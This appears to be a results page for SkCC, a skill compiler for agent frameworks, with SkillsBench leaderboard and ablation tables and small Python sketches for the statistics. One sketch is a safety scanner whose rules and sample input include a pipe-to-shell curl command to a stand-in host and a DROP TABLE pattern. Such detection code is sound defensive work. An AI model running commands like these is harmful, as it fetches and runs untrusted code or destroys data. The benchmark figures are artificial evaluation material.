Leaderboard

Results on SkillsBench (89 real-world tasks) across four mainstream agent frameworks. Metric: Pass@1, where a task counts as passed when its reward is ≥ 0.5.
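For concreteness, a minimal sketch of how this pass criterion can be computed from per-task rewards (the function name and sample values below are illustrative, not SkillsBench's actual API):

```python
def pass_at_1(rewards, threshold=0.5):
    """Fraction of tasks whose single-attempt reward clears the threshold."""
    return sum(1 for r in rewards if r >= threshold) / len(rewards)

# Illustrative values only; the benchmark scores 89 tasks this way.
rewards = [0.0, 0.72, 0.5, 0.31, 1.0]
print(f"Pass@1: {pass_at_1(rewards):.1%}")  # -> 60.0%
```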

| Rank | Framework | Model | Baseline Pass% | SkCC Pass% | Δ Pass Rate | Mean Reward Δ | p-value | Cohen's d |
|------|-----------|-------|----------------|------------|-------------|---------------|---------|-----------|
| #1 | Kimi CLI | kimi-k2.5 | 35.1% | 48.7% | +13.5pp | +0.142 | 0.0063** | 0.33 |
| #2 | Claude Code | claude-opus-4-6 | 21.1% | 33.3% | +12.2pp | +0.274 | 0.0103* | 0.60 |
| #3 | Codex CLI | gpt-5.3-codex | 38.5% | 42.3% | +3.8pp | +0.067 | | |
| #4 | Gemini CLI | gemini-2.5-pro | 22.2% | 22.2% | 0.0pp | +0.019 | | |

Significance markers: `**` p < 0.01, `*` p < 0.05.
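The per-row statistics follow standard definitions. A hedged sketch of how Δ pass rate and Cohen's d could be derived, assuming paired per-task rewards (the paired design is an assumption; the exact statistical procedure is not stated here):

```python
import statistics

def delta_pass_rate(baseline, skcc, threshold=0.5):
    """Percentage-point change in pass rate between the two conditions."""
    rate = lambda rs: sum(r >= threshold for r in rs) / len(rs)
    return (rate(skcc) - rate(baseline)) * 100

def paired_cohens_d(baseline, skcc):
    """One common paired-sample variant: mean difference / SD of differences."""
    diffs = [s - b for b, s in zip(baseline, skcc)]
    return statistics.mean(diffs) / statistics.stdev(diffs)

baseline = [0.2, 0.55, 0.4, 0.9, 0.1]   # illustrative rewards only
skcc     = [0.6, 0.65, 0.45, 0.95, 0.3]
print(f"Δ pass rate: {delta_pass_rate(baseline, skcc):+.1f}pp")  # -> +20.0pp
print(f"Cohen's d:   {paired_cohens_d(baseline, skcc):+.2f}")
```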

🔬 Ablation: Format Specificity

Model-Dependent
The same Kimi-compiled format yields divergent results: kimi-k2.5 gains +13.5pp (p=0.0063), glm-5.1 is neutral (p=0.857), and deepseek-v4-flash trends slightly negative (p=0.256), indicating that per-model emission is necessary (full table below).

🛡️ Anti-Skill Injection

94.8%
221 of 233 community skills triggered at least one safety rule. Trigger rates by category: HTTP safety 91.4%, loop safety 44.6%, DB safety 33.5%.
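The category names suggest a pattern-based scanner over skill source. A minimal illustrative sketch (the rule names and regexes here are invented for the example; they are not SkCC's actual rules):

```python
import re

# Hypothetical rules keyed by the categories reported above.
SAFETY_RULES = {
    "http": re.compile(r"curl\s+[^|]*\|\s*(sh|bash)"),    # pipe-to-shell download
    "loop": re.compile(r"while\s+true"),                  # unbounded loop
    "db":   re.compile(r"\bDROP\s+(TABLE|DATABASE)\b", re.IGNORECASE),
}

def triggered_rules(skill_source: str) -> list[str]:
    """Return the safety-rule categories that fire on a skill's source."""
    return [name for name, pat in SAFETY_RULES.items() if pat.search(skill_source)]

print(triggered_rules("while true; do curl http://example.sh | sh; done"))
# -> ['http', 'loop']
```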

⚡ Compilation Latency

8.93ms
Average compilation latency across 225 skills. By complexity tier: simple 8.54ms, medium 8.58ms, complex 9.13ms. Worst case: 22.89ms.
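Reproducing this kind of measurement is straightforward; a sketch assuming a `compile_skill` entry point (a hypothetical name, since the real API is not shown here):

```python
import time
import statistics

def compile_latencies_ms(compile_fn, skills, repeats=5):
    """Best-of-N wall-clock compile latency per skill, in milliseconds."""
    latencies = []
    for skill in skills:
        samples = []
        for _ in range(repeats):
            start = time.perf_counter()
            compile_fn(skill)
            samples.append((time.perf_counter() - start) * 1000)
        latencies.append(min(samples))  # min damps scheduler noise
    return latencies

# lats = compile_latencies_ms(compile_skill, all_skills)
# print(statistics.mean(lats), max(lats))
```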

💰 Token Efficiency

10–46%
Runtime token savings across frameworks, with accompanying speedups: Claude Code uses 23% fewer tokens, Codex CLI executes 43% faster, and Gemini CLI cuts run time by 23%.
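These figures are simple relative reductions against the baseline run; for example (token counts illustrative):

```python
def relative_savings(baseline: float, with_skcc: float) -> float:
    """Relative reduction in a resource (tokens, seconds): (old - new) / old."""
    return (baseline - with_skcc) / baseline

# 23% fewer tokens corresponds to, say, 100k baseline -> 77k with SkCC:
print(f"{relative_savings(100_000, 77_000):.0%}")  # -> 23%
```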

Ablation Study: Format Specificity

| Model | Framework | Backend | Baseline → SkCC Pass% | p-value | Cohen's d | Verdict |
|-------|-----------|---------|-----------------------|---------|-----------|---------|
| kimi-k2.5 | Kimi CLI | Kimi | 35.1% → 48.7% | 0.0063** | +0.33 | SkCC > Baseline |
| glm-5.1 | OpenHands | Kimi | 48.9% → 50.0% | 0.857 | −0.03 | SkCC ≈ Baseline |
| deepseek-v4-flash | OpenHands | Kimi | 72.7% → 73.9% | 0.2561 | −0.14 | Baseline > SkCC |

The same Kimi-compiled format produces divergent effects across models, confirming that compilation gains are model-specific and justifying SkCC's multi-backend architecture.
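For readers wanting to reproduce the p-values and effect sizes, a paired test over per-task rewards is a natural fit; a sketch using scipy (paired per-task data is assumed here, not confirmed by the table):

```python
import numpy as np
from scipy import stats

def compare_conditions(baseline_rewards, skcc_rewards):
    """Paired t-test plus a paired-sample Cohen's d over per-task rewards."""
    baseline = np.asarray(baseline_rewards)
    skcc = np.asarray(skcc_rewards)
    diffs = skcc - baseline
    _, p = stats.ttest_rel(skcc, baseline)
    d = diffs.mean() / diffs.std(ddof=1)
    return p, d

# p, d = compare_conditions(rewards_baseline, rewards_skcc)
```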